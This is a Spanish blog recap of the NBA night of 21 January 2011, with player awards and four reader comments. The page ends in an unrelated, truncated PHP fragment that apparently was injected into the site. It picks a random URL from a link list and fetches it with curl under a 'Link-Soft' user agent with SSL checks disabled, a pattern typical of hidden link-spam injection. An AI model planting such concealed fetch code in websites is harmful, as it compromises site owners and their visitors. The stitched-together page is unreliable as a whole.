La crónica 21/01/2011

22 de January de 2011 por TheDeerHunter

Humillación en Atlanta. Los Hornets se aplicaron en defensa para forzarles la anotación más baja de la historia de la franquicia. Si la primera parte fue un calvario con 34 puntos en total, la segunda fue de pesadilla con 25. La peor actuación de su carrera para Mike Bibby, que pide a gritos la retirada, pero su teórico relevo Jeff Teague estuvo aún peor que él incluso.

Los Hawks no fueron los únicos que hicieron el ridículo anoche. Los Raptors se llevaron una paliza de 40 en Orlando en una noche negra para Calderón (menuda jornada para los bases) y Howard abusando violentamente de Bargnani. Los Pistons también estuvieron lamentables en New Jersey, que desde que se han dejado de marear lo han ganado todo. Finalmente los Bucks pasaron sobrados su trámite en Cleveland recuperando por fin a Delfino para la causa… ahora que habían perdido a Salmons.

Volviendo a la zona noble de la liga victoria pírrica para los Celtics. Ganaron bien a unos Jazz en plena crisis, pero perdieron a Shaq. Si tarda en volver el único pívot disponible va a ser Erden, así que se trata de una incidencia significativa para sus aspiraciones. El próximo fin de semana visitan el Staples. Los Lakers dieron la de cal ganando en Denver en un partido muy serio por su parte y un tercer cuarto maravilloso de Kobe.

Mientras los Spurs siguen imparables doblegando a los Knicks con duelos que evocan otros tiempos entre Duncan vs Stat y Popovic vs D’Antoni, terminando como siempre aunque los tejanos están a estas alturas como nunca.

Los Grizzlies se llevaron el choque fundamental de competencia directa contra los Rockets gracias a una extraordinaria actuación de Zach Randolph. Es su noveno doble-doble consecutivo igualando el anterior récord de la franquicia, que suponemos estaba en manos de Pau. Los Suns aguantaron el ritmo en Washington con un partidazo de Channing Frye y los Warriors ganaron en la prórroga a Sacramento con el magnífico duelo de Sophomores Tyreke vs Curry. Cuidado porque hubo susto con Monta Ellis.

MVP: Tres jugadores interiores compiten por el galardon. Dwight Howard se quedó a gusto destrozando a los Raptors con 31 puntos y 19 rebotes, Zach Randolph fue el culpable de la derrota de los Rockets en Memphis con 29 puntos y 19 rebotes. Pero el premio va para Tim Duncan que le dio una clase avanzada a Amare sobre liderazgo, 21 puntos, 16 rebotes, 8 asistencias, 5 tapones, 8 de 15 en tiros y 5 de 6 en libres, ¡¡IDOLO!!.

Rookie: DeMarcus Cousins se alza con el premio gracias a sus 21 puntos, 8 rebotes y 5 asistencias. John Wall con 11 puntos, 14 rebotes y 4 robos tiene que aprender a cuidar la bola, ayer 5 pérdidas. Buen partido de Gordon Hayward 11-5-3.

Sorpresa: A cada oportunidad que recibe demuestra su categoría, Ryan Anderson ayudó a los suyos con 21 puntos y 10 rebotes, quien sabe cuando decidirá Van Gundy defenestrarlo de nuevo. Dooling hizo olvidar a Jennings con 12 puntos y 11 rebotes frente a los Cavs, donde Sessions lo intentó con 22 puntos, 4 rebotes y 4 asistencias. Tampoco son habituales los 25 puntos y 8 rebotes de Channing Frye.

Decepción: Toronto Raptors y Atlanta Hawks perdieron por 40 puntos anoche, la vergonzosa actuación colectiva se refleja en los 0 puntos con 0 de 6 de Jose Calderón y los 0 puntos con 0 de 7 de Mike Bibby. Los Hawks además lo hicieron en casa, vaya dinero se gastaron sus aficionados en la entrada.

MEV: No hubo muchos grandes esfuerzos, el premio es para Tyreke Evans con 35 puntos, 3 rebotes y 5 asistencias. Afflalo con 22-4-4, el mencionado Sessions, Kevin Martin con 32 puntos y Nick Young con 25 puntos y 8 rebotes.

Comenta

4 comentarios a esta entrada

  1. Denise dice:
    #1

    0/15 para los bases de Atlanta. La verdad es que Bibby lleva ya 3 años que no merece jugar más de 15 minutos. Atlanta necesita un buen base como el comer.
    Vaya racha de victoria de los Hornets, que siguen sobreviviendo muy dignamente en el salvaje Oeste. La clave es Mbenga que es un talismán, allá por donde va triunfa..
    Los dinosaurios se extinguieron ayer, vaya paliza de Magic a Raptors, hicieron con ellos lo que les dio la gana, sobretodo en la zona. Este equipo echa de menos a Reggie Evans.
    Partido muy serio el de Lakers, en especial en la segunda parte. Estos son los partidos en los que Kobe me gusta, prefiero a un Kobe haciendo un 18-6-6, con buenos % y seleccionando muy bien su tiro como ayer, que el Kobe de 30 puntos tirando mandarinas con 3 tios encima como tanto vimos en el pasado y en algunas ocasiones esta temporada. Aunque en defensa está flojo ultimamente, quizás está reservandose, lo cierto es que el otro día se comio unos cuantos triples de Gordon, y ayer se comió los de Afflalo, eso sí, en la 2º parte, Afflalo desapareció, pero que bueno es este tipo, y Lawson también.
    Destacaría también a Odom, para mi, al margen de los números, la mejor temporada de su vida, y buen partido ayer el de Ron Ron.

      Citar

  2. sergio dice:
    #2

    En los proximos 13 partidos veremos el nivel real de estos Spurs. Con 12 de esos enfrentamientos a domicilio y rivales como New Orleans, Utah, Lakers, Portland o Bulls. Lo bueno para ellos es que han cogido velocidad crucero para las victorias y, para mi, son el equipo que mejor juego de conjunto esta demostrando ahora mismo y sin fallar ninguna de las piezas

      Citar

  3. Vader dice:
    #3

    Lo de los Hawks es muy duro porque encima en su dia eligieron a Marvin Williams por delante de Chris Paul o Deron Williams… de traca…

    Saludos

      Citar

  4. Denise dice:
    #4

    ¿Qué estaba buscando Parker anoche por el suelo de la cancha de los Hornets? jajaja, que alegria me da que pierdan los Spurs, Derrota también de Celtics, y palizas de Heat y Magic.
    Otra victoria más de Blazers y ya van….qué malo son McMillan y Batum, no entiendo que hacen en la NBA….(ironia off).

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>